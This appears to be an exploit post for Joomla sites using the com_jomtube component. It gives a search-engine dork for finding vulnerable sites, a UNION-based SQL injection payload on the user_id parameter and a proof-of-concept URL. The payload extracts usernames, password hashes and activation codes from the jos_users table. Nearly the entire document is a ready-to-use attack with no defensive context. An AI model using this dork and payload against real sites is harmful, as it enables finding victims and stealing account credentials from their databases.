[ joomla ] Sql Injection Admin rwxr-xr-x 0 21.31

Filename	[ joomla ] Sql Injection
Permission	rw-r--r--
Author	Admin
Date and Time	21.31
Label
Action

Dork:
inurl:/index.php?option=com_jomtube

Exploite:
view=videos&type=member&user_id=-62+union+select+1,2,password,4,5,6,7,8,9,10,11,12, group_concat(0x3a5f,username,0x3a,activation,0x5f3 a),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ jos_users--&option=com_jomtube


POC:

http://blabla.com/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%280x3a5f,username,0x3a,activation,0x5f3a%29,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube